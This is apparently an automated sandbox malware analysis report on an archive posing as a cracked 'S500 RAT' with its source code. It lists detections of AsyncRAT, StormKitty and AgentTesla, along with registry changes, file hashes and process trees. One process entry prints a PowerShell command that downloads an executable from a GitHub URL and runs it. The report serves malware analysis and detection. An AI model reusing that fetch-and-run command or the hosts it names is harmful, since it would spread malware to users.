Malware Analysis Report

2024-10-10 10:39

Sample ID 240320-vxlxtaeg8s
Target S500 RAT Cracked + Source .rar
SHA256 54008e93bf228c29b7592f30f3f57cb6d8e419d6c9d2aa154c1a582160efbfff
Tags
upx asyncrat default rat agilenet identifier stormkitty arrowrat agenttesla spyware stealer
score
10/10

Analysis Overview

Threat Level: Known bad

The file S500 RAT Cracked + Source .rar was found to be: Known bad.

Malicious Activity Summary

StormKitty

Async RAT payload

StormKitty payload

Asyncrat family

Agenttesla family

AgentTesla payload

AsyncRat

Arrowrat family

Stormkitty family

Contains code to disable Windows Defender

Async RAT payload

Blocklisted process makes network request

Executes dropped EXE

UPX packed file

Checks computer location settings

Loads dropped DLL

Obfuscated with Agile.Net obfuscator

Reads user/profile data of web browsers

Looks up geolocation information via web service

Looks up external IP address via web service

Drops desktop.ini file(s)

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Modifies registry class

Modifies Internet Explorer settings

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SendNotifyMessage

Checks processor information in registry

Modifies system certificate store

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Checks SCSI registry key(s)

Opens file in notepad (likely ransom note)

Analysis: static1

Detonation Overview

Reported

2024-03-20 17:23

Signatures

AgentTesla payload

Agenttesla family

agenttesla

Arrowrat family

arrowrat

Async RAT payload

rat

Asyncrat family

asyncrat

StormKitty payload

Stormkitty family

stormkitty

Obfuscated with Agile.Net obfuscator

agilenet

UPX packed file

upx

Unsigned PE

Analysis: behavioral3

Detonation Overview

Submitted

2024-03-20 17:22

Reported

2024-03-20 17:47

Platform

win10v2004-20240226-en

Max time kernel

1287s

Max time network

1172s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe N/A

UPX packed file

upx

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\Local Settings C:\Program Files\7-Zip\7zFM.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3316 wrote to memory of 3672 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe
PID 4228 wrote to memory of 4556 N/A C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe C:\Windows\system32\cmd.exe
PID 4556 wrote to memory of 3460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 4556 wrote to memory of 5036 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 844 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskhostw.exe
PID 4516 wrote to memory of 3736 N/A C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe C:\Windows\system32\cmd.exe
PID 3736 wrote to memory of 4124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 3736 wrote to memory of 3176 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\ServerRegistrationManager.exe
PID 3736 wrote to memory of 4044 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3736 wrote to memory of 2916 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskhostw.exe
PID 3672 wrote to memory of 1252 N/A C:\Program Files\7-Zip\7zFM.exe C:\Windows\system32\NOTEPAD.EXE

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe

"C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3E04.tmp\3E05.tmp\3E06.bat "C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe""

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-WebRequest 'https://github.com/CVE-TEAMDSNH-20230611/20230611VNM/raw/main/taskhostw.exe' -OutFile taskhostw.exe"

C:\Windows\system32\taskhostw.exe

taskhostw.exe

C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe

"C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E61B.tmp\E61C.tmp\E61D.bat "C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe""

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\ServerRegistrationManager.exe

ServerRegistrationManager.exe

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-WebRequest 'https://github.com/CVE-TEAMDSNH-20230611/20230611VNM/raw/main/taskhostw.exe' -OutFile taskhostw.exe"

C:\Windows\system32\taskhostw.exe

taskhostw.exe

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO85E5D4EA\Readme.txt

Network

Files

C:\Users\Admin\AppData\Local\Temp\7zE85E26919\S500 RAT Source Code\Forms\Form4.resx

MD5 0a4e049a213aef04a4b1fa145a76a752
SHA1 3603cb74a5883c3086cb483eb5ed2a1d452fbeb1
SHA256 203301e3afc69af0045e4c6d28920fdce85a678de2bb79f53dde11bc7df63d8f
SHA512 23ee1f3c0b8bd72f7a9c3e904f21b830d27ba5a80e77e3b08790fb7438180c9d9c287da22c84ea41cdf74aee71f1bcb187dd6ea50bdee45b88a3a5cfd7808016

C:\Users\Admin\AppData\Local\Temp\7zE85E26919\S500 RAT Source Code\Forms\FormDOS.resx

MD5 5c43b1a8ce131be5e8271794ec520a54
SHA1 1d2f31f18ac0b543bab6a1f45ac2d388a6ad119a
SHA256 048b4c1bd3a6d8c36d30bab692e8b2b24c8ea7310ec7cfdbd5f73e65ec62b153
SHA512 4ffe82161a7a1578f8d0299115362c88fd7dec77fe08ab7ca886ae97eb0b064a3d1b7f0529b4708095bef4a278018e70a730f37a147edc338e0d61d31d3f40d6

C:\Users\Admin\AppData\Local\Temp\7zE85E26919\S500 RAT Source Code\obj\Debug\net48\Anarchy.Forms.FormRegValueEditMultiString.resources

MD5 beda8bbd2a72e45431cf5dd68f7c6e61
SHA1 18e28ada040e4c62e33d946046a9ccf66f839f0d
SHA256 f9f9c2a4855d61b7c7f93e9258d0306be802ef9c8c8929186deb71ee96b06d4c
SHA512 6287bb138431c33a2dd30b7c06c979ee89f691900eb407e14465d58188d04d7697ecc68eb6d479db664ea86f35b7ce6b611834028ddbd56513003c1ca28f0899

C:\Users\Admin\AppData\Local\Temp\7zE85E26919\S500 RAT Source Code\obj\Debug\net48\Anarchy.Forms.FormSendFileToMemory.resources

MD5 fa80841e3dc9ffb31dd5d015c1030172
SHA1 aa0d9e66db2a8528edf9931fe132f18870307216
SHA256 a5b9f5ccfe8ac46a630ac1cc112d343364fa2bc4a2bec0f3911322cff174cff9
SHA512 a38cc863d3c0c8d944340cd4116f03bbdb2f1526fb40b476cd0adbd444fd1dc10790d35eaf50ea34a1083b163baa82251a5048f075651bc14e46ac4cb82897bd

C:\Users\Admin\AppData\Local\Temp\7zE85E26919\S500 RAT Source Code\obj\S500RAT.csproj.nuget.g.targets

MD5 3d9ef7c4c2db6e7631832825418a9ba6
SHA1 b2ac00b06d61c8498914ea52eaedaab01fae1a21
SHA256 6d1bba3214839a263b1c34c8668d7dc5ff2d0ee91cd4a1b01d251b7595ee94d7
SHA512 641939c4c1b7e61c90aa8ffaf9e3ac701c669a0d58ee85706f291197bacd2717451deb0fe95b4b9bb0daa56965fcdfcfe065decfcab657ac380b132887023035

C:\Users\Admin\AppData\Local\Temp\7zE85E26919\S500 RAT Source Code\obj\S500RAT.csproj.nuget.g.props

MD5 3108edc3f74d08bec485f1fc0aabab5b
SHA1 e1e14322ab3e69a69a7b0c9efd5b845a112320b8
SHA256 e785c6a42a443ab0b9fd7888d8d37ee280c833226d9a56e2e1840edebfa8f584
SHA512 750609750b366cdd1efd04035c742af2127d8341a22e4ce48c378f74a85414705e168f036df26f0095a82ce09142af52fbcd8a0227cc966d9c472c2f70a1907e

C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe

MD5 7ba3ab7d000bd8f2206e08abdbe74d7d
SHA1 6940a66fecfed2706db0368b36a9a27f20b93e25
SHA256 05156b19fa8699fa4aa7f59d07fb78730d5313d025c242ac4cdf591d928e97e1
SHA512 c42a3fe48e2bad222a72742028e2709a59fa0d36915c07f7332436d31b452ce358765c418fc7f0011849e10468363470f732b56b2c17029e5003b9c9ef033249

memory/4228-999-0x0000000000400000-0x0000000000439000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe

MD5 9b694ed7d344cd6f2e02977fbdc07a0a
SHA1 2bc6f78a91b26026c51051e646d788488c776855
SHA256 2bcd8656e5e55f05143a5fd31434719e0b843567f3a7b69a392b4abb17fc63bd
SHA512 6ce0b9a9cac4b42ffd8c7f337a41e475595b051c68529e299df7519016c7b9883af10921683a919fe8ae3069740d4c96d4f645edeb0891fc4e01fc73b17a2518

C:\Users\Admin\AppData\Local\Temp\3E04.tmp\3E05.tmp\3E06.bat

MD5 fc4af7384f0b6f274dd3e745f0aceeaa
SHA1 31b310f869b15b84e52ef282cabaee974e5043cf
SHA256 f27a781bd4e8788990ceecac17ba4b9642e15f0d311e17d62c70db694c207a34
SHA512 dc7b542d89236105c8b8976e5af0e9e557eaa919adb2e8384b55b70c0b5bc6f00d2010538b9abaca90bb797d24fd509acdc1b3a6beea27f11405bf198349f57f

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oyauzrce.43f.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5036-1008-0x000001DE72EC0000-0x000001DE72EE2000-memory.dmp

memory/5036-1013-0x00007FFA677D0000-0x00007FFA68291000-memory.dmp

memory/5036-1014-0x000001DE724D0000-0x000001DE724E0000-memory.dmp

memory/5036-1015-0x000001DE724D0000-0x000001DE724E0000-memory.dmp

memory/5036-1018-0x00007FFA677D0000-0x00007FFA68291000-memory.dmp

memory/4228-1019-0x0000000000400000-0x0000000000439000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zE85E1A78A\cGeoIp.dll

MD5 6d6e172e7965d1250a4a6f8a0513aa9f
SHA1 b0fd4f64e837f48682874251c93258ee2cbcad2b
SHA256 d1ddd15e9c727a5ecf78d3918c17aee0512f5b181ad44952686beb89146e6bd0
SHA512 35daa38ad009599145aa241102bcd1f69b4caa55ebc5bb11df0a06567056c0ec5fcd02a33576c54c670755a6384e0229fd2f96622f12304dec58f79e1e834155

C:\Users\Admin\AppData\Local\Temp\7zE85E1A78A\protobuf-net.dll

MD5 9fbb8cec55b2115c00c0ba386c37ce62
SHA1 e2378a1c22c35e40fd1c3e19066de4e33b50f24a
SHA256 9f01d9f2ed07e630ec078efa5d760762c3c8ad3b06e9e8a9062a37d63d57b026
SHA512 da0211d1c9ba0a59616bc15de80a1fed62b0405cad3b11ae4220ef1488c7837634aad67cbc8b484621a2a6288ef5e424cd816a2523bdb6167abcab76f3ac1a04

C:\Users\Admin\AppData\Local\Temp\7zE85E1A78A\Vestris.ResourceLib.dll

MD5 944ce5123c94c66a50376e7b37e3a6a6
SHA1 a1936ac79c987a5ba47ca3d023f740401f73529b
SHA256 7da3f0e77c4dddc82df7c16c8c781fade599b7c91e3d32eefbce215b8f06b12a
SHA512 4c034ff51cc01567f3cb0796575528ca44623b864eb606266bcf955a9259ed26b20bec0086d79038158d3a5af2ada0a90f59d7c6aae9e545294fe77825dbe08b

C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe

MD5 5b52658c4517684971de10a6b7a67c30
SHA1 f0820c52617ebacaf53d8b8d97f1a42c712888bd
SHA256 3ec85206a8c5d584c2cf4ab575bdd5cf4b29ed3a896032a1adc37f1c08507b31
SHA512 ce96d25cfbb0d2c4addf242aa05c05909d7a883a70881df8336498b16913ec21bd64c07519eba89b2da90a05902fd7618e172a7602b985153eac09d9f226c8d6

C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\ServerRegistrationManager.exe

MD5 7a8d11174bebefad4409d477b20825b7
SHA1 b6d0e9230fe339b4d200acbf401f66a6facd3a08
SHA256 0760e54f54e20d7d63e5016eb204e913633ce5857d1fc722ac39977453712e3b
SHA512 2116a695a640390fdf6558c6def1900eb6edff1ac3e65030ea81ae346f1965135ab97600c4c20cb3bddc7db643e42cc74e88829bf78c9d254e7014648b88f2cb

C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\ServerRegistrationManager.exe

MD5 9e83a638e31058801b0ddeea8202760d
SHA1 9fdfafd6855469dd3f6171f7c6283d94c477e9e8
SHA256 6f296f3c16c7aba99d3ed032a186934280bda76db96e9322bef5193d306a8df7
SHA512 20378249a49ecb99367c715087cb2b80b1a75c198b67e0c800c458b7d2f403e85e295d00f612cf8f12b0dd6698062a761e71e2ae7477e117dce5eb394770d10c

memory/3176-1310-0x00007FFA677D0000-0x00007FFA68291000-memory.dmp

memory/3176-1311-0x0000023737FA0000-0x0000023739064000-memory.dmp

memory/3176-1312-0x0000023739430000-0x0000023739440000-memory.dmp

memory/3176-1314-0x00000237538D0000-0x0000023753AC4000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\Guna.UI2.dll

MD5 4544872c197f9ad471bb18c648b004b0
SHA1 280a1ec5ab002d1ab15279b3fb0de8dd3c4aa482
SHA256 bf4aec4b6a094c21008b4788be9ca7072fcff0800cf1c098828222769b311e7b
SHA512 aaf6a5a357976f6a83672009d3648f4dd7303bdd91eeca6b2d1ce35f59cb65563daa70505162f862bb7ce322d9645dbabd49e9a8f8a9e22d4d169f3d59ac8aca

C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.pdb

MD5 e90f5f88df944bd07f5e2f42a2665200
SHA1 f1f55ee3fe858e854848d4c3ccdebc9b3009f638
SHA256 e4770d767eed1e5bf31d2eeb8e543b60eeffff423515eb60a1c9329ff66ea9dc
SHA512 c605c4f392cfa61e50b47c2d24c4a69d54f657e4f6c99a8da73cc0ae2d240257f4bedbcb508757e70e96f868e078e6d8969ad94fb677356fa9278279e45c82da

memory/3176-1316-0x00007FFA677D0000-0x00007FFA68291000-memory.dmp

memory/1536-1317-0x000002A242AC0000-0x000002A242AC1000-memory.dmp

memory/1536-1318-0x000002A242AC0000-0x000002A242AC1000-memory.dmp

memory/1536-1319-0x000002A242AC0000-0x000002A242AC1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

memory/4044-1321-0x00007FFA677D0000-0x00007FFA68291000-memory.dmp

memory/4044-1322-0x00000134B5EB0000-0x00000134B5EC0000-memory.dmp

memory/4516-1323-0x0000000000400000-0x0000000000439000-memory.dmp

memory/4044-1324-0x00000134B5EB0000-0x00000134B5EC0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ef5ef35c3059825861b16409862d0e3d
SHA1 cde5311765478b1bcf309219c1a86a0238612099
SHA256 53df4a6c07213c72fa9c8f1e6c20d5a771d587744f775b4d45b647c1f890cc4b
SHA512 3c5814f9f94f4127f175b79e9d95eb7426c67b2d593ef6880c62cc3541d36142b9cb7391e3eac58fe45991d4e5fa7f979c96cba91da2354b7f56d8a2bb76dd20

C:\Users\Admin\AppData\Local\Temp\7zO85E5D4EA\Readme.txt

Analysis: behavioral4

Detonation Overview

Submitted

2024-03-20 17:22

Reported

2024-03-20 17:56

Platform

win11-20240214-en

Max time kernel

1288s

Max time network

1272s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 33 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 34 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 35 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 36 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3556 wrote to memory of 1436 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe

"C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\S500 RAT Cracked\Login.txt

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe

C:\Users\Admin\Desktop\S500 RAT Cracked\Login.txt

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-20 17:22

Reported

2024-03-20 17:47

Platform

win7-20240221-en

Max time kernel

1313s

Max time network

1240s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

Signatures

AsyncRat

rat asyncrat

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\Admin@IZKCKOTP_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\Admin@IZKCKOTP_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
File created C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\Admin@IZKCKOTP_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
File created C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\Admin@IZKCKOTP_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
File created C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\Admin@IZKCKOTP_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A icanhazip.com N/A N/A

Looks up geolocation information via web service

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\TypedURLs C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = <binary blob omitted> C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = <binary blob omitted> C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
